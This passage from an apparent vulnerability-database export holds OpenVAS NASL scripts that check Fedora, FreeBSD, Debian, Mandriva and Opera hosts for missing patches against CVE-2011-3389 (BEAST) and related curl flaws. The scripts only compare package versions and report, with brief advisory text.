14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:36 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17399\");\n script_name(\"Fedora Update for nss-softokn FEDORA-2011-17399\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'nss-softokn'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"nss-softokn on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"nss-softokn\", rpm:\"nss-softokn~3.13.1~15.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-02T21:10:44", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2012-08-30T00:00:00", "type": "openvas", "title": "FreeBSD Ports: fetchmail", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2017-04-25T00:00:00", "id": "OPENVAS:71832", "href": "http://plugins.openvas.org/nasl.php?oid=71832", "sourceData": "#\n#VID 18ce9a90-f269-11e1-be53-080027ef73ec\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 18ce9a90-f269-11e1-be53-080027ef73ec\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: fetchmail\n\nCVE-2011-3389\nThe SSL protocol, as used in certain configurations in Microsoft\nWindows and Microsoft Internet Explorer, Mozilla Firefox, Google\nChrome, Opera, and other products, encrypts data by using CBC mode\nwith chained initialization vectors, which allows man-in-the-middle\nattackers to obtain plaintext HTTP headers via a blockwise\nchosen-boundary attack (BCBA) on an HTTPS session, in conjunction with\nJavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java\nURLConnection API, or (3) the Silverlight WebClient API, aka a 'BEAST'\nattack.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(71832);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3389\");\n script_version(\"$Revision: 6022 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-25 14:51:04 +0200 (Tue, 25 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 11:34:17 -0400 (Thu, 30 Aug 2012)\");\n script_name(\"FreeBSD Ports: fetchmail\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\nvuln = 0;\ntxt = \"\";\nbver = portver(pkg:\"fetchmail\");\nif(!isnull(bver) && revcomp(a:bver, b:\"6.3.9\")>=0 && revcomp(a:bver, b:\"6.3.22\")<0) {\n txt += \"Package fetchmail version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt ));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for nss-util FEDORA-2011-17400", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864068", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864068", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nss-util FEDORA-2011-17400\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-December/071320.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864068\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 13:06:51 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17400\");\n script_name(\"Fedora Update for nss-util FEDORA-2011-17400\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'nss-util'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"nss-util on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"nss-util\", rpm:\"nss-util~3.13.1~3.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:06", "description": "The remote host is missing an update to curl\nannounced via advisory DSA 2398-1.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2398-1 (curl)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2012-0036"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231070715", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070715", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2398_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2398-1 (curl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70715\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-3389\", \"CVE-2012-0036\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 06:35:15 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2398-1 (curl)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202398-1\");\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been discovered in Curl, an URL transfer\nlibrary. The Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\nCVE-2011-3389\n\nThis update enables OpenSSL workarounds against the BEAST attack.\n\nCVE-2012-0036\n\nDan Fandrich discovered that Curl performs insufficient sanitising\nwhen extracting the file path part of an URL.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 7.18.2-8lenny6.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 7.21.0-2.1+squeeze1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 7.24.0-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your curl packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to curl\nannounced via advisory DSA 2398-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"curl\", ver:\"7.18.2-8lenny6\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl3\", ver:\"7.18.2-8lenny6\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl3-dbg\", ver:\"7.18.2-8lenny6\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl3-gnutls\", ver:\"7.18.2-8lenny6\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl4-gnutls-dev\", ver:\"7.18.2-8lenny6\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl4-openssl-dev\", ver:\"7.18.2-8lenny6\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"curl\", ver:\"7.21.0-2.1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl3\", ver:\"7.21.0-2.1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl3-dbg\", ver:\"7.21.0-2.1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl3-gnutls\", ver:\"7.21.0-2.1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl4-gnutls-dev\", ver:\"7.21.0-2.1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl4-openssl-dev\", ver:\"7.21.0-2.1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:51:07", "description": "The remote host is missing an update to curl\nannounced via advisory DSA 2398-1.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2398-1 (curl)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2012-0036"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:70715", "href": "http://plugins.openvas.org/nasl.php?oid=70715", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2398_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2398-1 (curl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in Curl, an URL transfer\nlibrary. The Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\nCVE-2011-3389\n\nThis update enables OpenSSL workarounds against the BEAST attack.\nAdditional information can be found in the Curl advisory:\nhttp://curl.haxx.se/docs/adv_20120124B.html\n\nCVE-2012-0036\n\nDan Fandrich discovered that Curl performs insufficient sanitising\nwhen extracting the file path part of an URL.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 7.18.2-8lenny6.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 7.21.0-2.1+squeeze1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 7.24.0-1.\n\nWe recommend that you upgrade your curl packages.\";\ntag_summary = \"The remote host is missing an update to curl\nannounced via advisory DSA 2398-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202398-1\";\n\nif(description)\n{\n script_id(70715);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-3389\", \"CVE-2012-0036\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 06:35:15 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2398-1 (curl)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"curl\", ver:\"7.18.2-8lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl3\", ver:\"7.18.2-8lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl3-dbg\", ver:\"7.18.2-8lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl3-gnutls\", ver:\"7.18.2-8lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl4-gnutls-dev\", ver:\"7.18.2-8lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl4-openssl-dev\", ver:\"7.18.2-8lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"curl\", ver:\"7.21.0-2.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl3\", ver:\"7.21.0-2.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl3-dbg\", ver:\"7.21.0-2.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl3-gnutls\", ver:\"7.21.0-2.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl4-gnutls-dev\", ver:\"7.21.0-2.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl4-openssl-dev\", ver:\"7.21.0-2.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-04T14:19:46", "description": "The host is installed with Opera and is prone to information\n disclosure vulnerability.", "cvss3": {}, "published": "2011-09-09T00:00:00", "type": "openvas", "title": "Opera Extended Validation Information Disclosure Vulnerabilities (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3388", "CVE-2011-3389"], "modified": "2017-08-28T00:00:00", "id": "OPENVAS:802332", "href": "http://plugins.openvas.org/nasl.php?oid=802332", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_opera_extented_validation_info_disc_vuln_win.nasl 7015 2017-08-28 11:51:24Z teissa $\n#\n# Opera Extended Validation Information Disclosure Vulnerabilities (Windows)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation allows remote attackers to steal sensitive security\n information.\n Impact Level: Application\";\ntag_affected = \"Opera version before 11.51\";\ntag_insight = \"Multiple flaws are due to an error when loading content from trusted\n sources in an unspecified sequence that causes the address field and page\n information dialog to contain security information based on the trusted site\n and loading an insecure site to appear secure via unspecified actions related\n to Extended Validation.\";\ntag_solution = \"Upgrade to Opera version 11.51 or later.\n For updates refer to http://www.opera.com/download/\";\ntag_summary = \"The host is installed with Opera and is prone to information\n disclosure vulnerability.\";\n\nif(description)\n{\n script_id(802332);\n script_version(\"$Revision: 7015 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-28 13:51:24 +0200 (Mon, 28 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-09 17:36:48 +0200 (Fri, 09 Sep 2011)\");\n script_cve_id(\"CVE-2011-3388\",\"CVE-2011-3389\");\n script_bugtraq_id(49388);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"Opera Extended Validation Information Disclosure Vulnerabilities (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/45791\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id?1025997\");\n script_xref(name : \"URL\" , value : \"http://www.opera.com/support/kb/view/1000/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_opera_detection_win_900036.nasl\");\n script_require_keys(\"Opera/Win/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\noperaVer = get_kb_item(\"Opera/Win/Version\");\nif(!operaVer){\n exit(0);\n}\n\n# Check for opera version < 11.51\nif(version_is_less(version:operaVer, test_version:\"11.51\")){\n security_message(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:04", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-08-03T00:00:00", "type": "openvas", "title": "Mandriva Update for curl MDVSA-2012:058 (curl)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2012-0036"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310831573", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831573", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for curl MDVSA-2012:058 (curl)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:058\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831573\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 09:50:18 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2011-3389\", \"CVE-2012-0036\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"MDVSA\", value:\"2012:058\");\n script_name(\"Mandriva Update for curl MDVSA-2012:058 (curl)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'curl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(2011\\.0|2010\\.1)\");\n script_tag(name:\"affected\", value:\"curl on Mandriva Linux 2011.0,\n Mandriva Linux 2010.1\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities has been found and corrected in curl:\n\n curl is vulnerable to a SSL CBC IV vulnerability when built to use\n OpenSSL for the SSL/TLS layer. A work-around has been added to mitigate\n the problem (CVE-2011-3389).\n\n curl is vulnerable to a data injection attack for certain protocols\n through control characters embedded or percent-encoded in URLs\n (CVE-2012-0036).\n\n The updated packages have been patched to correct these issues.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"curl\", rpm:\"curl~7.21.7~1.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"curl-examples\", rpm:\"curl-examples~7.21.7~1.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcurl4\", rpm:\"libcurl4~7.21.7~1.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcurl-devel\", rpm:\"libcurl-devel~7.21.7~1.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64curl4\", rpm:\"lib64curl4~7.21.7~1.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64curl-devel\", rpm:\"lib64curl-devel~7.21.7~1.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"curl\", rpm:\"curl~7.20.1~2.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"curl-examples\", rpm:\"curl-examples~7.20.1~2.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcurl4\", rpm:\"libcurl4~7.20.1~2.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcurl-devel\", rpm:\"libcurl-devel~7.20.1~2.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64curl4\", rpm:\"lib64curl4~7.20.1~2.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n 